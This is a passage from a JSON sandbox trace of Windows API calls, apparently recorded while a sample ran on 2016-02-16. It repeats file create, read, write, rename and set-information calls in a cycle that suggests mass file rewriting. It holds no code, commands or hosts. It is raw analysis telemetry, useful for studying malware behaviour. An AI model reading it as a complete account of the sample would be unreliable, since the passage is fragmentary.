17:41:41,922", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,922", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,932", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,932", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,932", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,932", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,932", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,932", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,932", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,932", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,932", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,942", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,942", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,942", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,942", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,942", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,942", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,942", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,942", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,942", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,942", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,942", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,952", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,952", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,952", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,952", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,952", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,952", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,952", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,962", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,962", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,962", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,962", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,962", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,962", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,962", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,962", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,962", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,962", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,962", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,972", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,972", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,972", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,972", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,972", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,972", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,972", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,972", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,972", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,972", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,983", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,983", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,983", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,983", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,983", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,983", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,983", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,983", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,983", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,993", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,993", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,993", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,993", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,993", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,993", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,993", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,993", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,993", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,993", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,993", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,003", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,003", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,003", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,003", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,003", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,003", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,003", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,003", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,003", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,003", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,013", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,013", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,013", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,013", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,013", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,013", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,013", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,013", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,013", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,013", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,023", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,023", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,023", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,023", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,023", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,023", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,033", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,033", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,033", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,033", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,033", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,033", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,033", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,033", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,033", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,033", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,043", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,043", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,043", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,043", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,043", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,043", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,043", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,043", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,043", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,053", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,053", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,053", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,053", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,053", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,053", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:42,053", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,053", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,053", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,063", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,063", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,063", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,063", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,063", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,063", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,063", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,063", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,073", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,073", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,073", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,073", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,073", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,073", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,073", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,073", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,083", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,083", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,083", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,083", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,083", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,083", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,083", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,083", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,083", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,083", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,083", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,083", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,093", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,093", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:42,093", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:42,093", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:42,093", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:42,093", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:42,093", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,093", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,093", "api": "MoveFileWithProgressW"}, {"category": "device", "timestamp": "2016-02-16 17:41:42,093", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,093", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,093", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,093", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,103", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,103", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,103", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,103", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,103", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,103", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,103", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,103", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,103", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,103", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,113", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,113", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,113", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,113", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,113", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,113", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,113", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,113", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,143", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,143", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,143", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,143", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,143", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,143", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,143", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,153", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,153", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:42,153", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,153", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,153", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,153", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,153", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,153", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,153", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,153", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,153", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,163", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,163", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,163", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,163", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,163", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,163", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,163", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,163", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,163", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,163", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,173", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,173", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,173", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,173", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,173", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,173", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,173", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,173", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,183", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,183", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,183", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,183", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,183", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,183", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,183", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,183", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,193", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,193", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,193", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,193", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,193", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,193", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,193", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,193", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,193", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,193", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,193", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,203", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,203", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,203", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,203", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,203", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,203", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,203", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,203", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,213", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,213", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,213", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,213", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,213", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,213", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,213", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,213", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,213", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,213", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,223", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,223", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,223", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,223", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,223", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,223", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,223", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,223", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,223", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,223", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,233", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,233", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,233", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,233", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,233", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,233", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,233", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,233", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,233", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,243", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,243", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,243", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,253", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,253", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,253", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,253", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,253", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,253", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,253", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,263", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,263", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,263", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,263", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,263", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,263", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,263", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,263", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,263", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,263", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,263", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,263", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,263", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,273", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,273", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,273", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,273", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,273", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,273", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,273", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,273", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,273", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,273", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,273", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,283", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,283", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,283", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,283", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,283", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,283", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,283", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,283", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,283", "api": "MoveFileWithProgressW"}, {"category": "filesystem", 